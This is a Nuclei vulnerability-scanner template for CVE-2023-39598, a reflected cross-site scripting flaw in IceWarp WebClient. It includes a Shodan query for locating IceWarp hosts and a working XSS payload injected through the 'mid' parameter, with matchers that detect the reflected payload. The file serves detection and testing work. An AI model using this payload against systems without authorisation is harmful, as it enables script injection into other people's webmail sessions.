nuclei-templates/http/cves/2023/CVE-2023-39598.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2023-09-10 01:26:17 +00:00
id: CVE-2023-39598
info:
2023-09-10 01:26:17 +00:00
name: IceWarp Email Client - Cross Site Scripting
author: Imjust0
severity: medium
2023-09-10 01:26:17 +00:00
description: |
Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
reference:
2023-09-10 01:26:17 +00:00
- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
- https://nvd.nist.gov/vuln/detail/CVE-2023-39598
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
metadata:
max-request: 1
shodan-query: title:"icewarp"
verified: "true"
tags: cve,cve2023,xss,icewarp
http:
- method: GET
path:
2023-09-10 01:26:17 +00:00
- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
2023-09-10 01:26:17 +00:00
- "<img src=x onerror=confirm(document.domain)>"
- "icewarp"
condition: and
- type: status
status:
- 200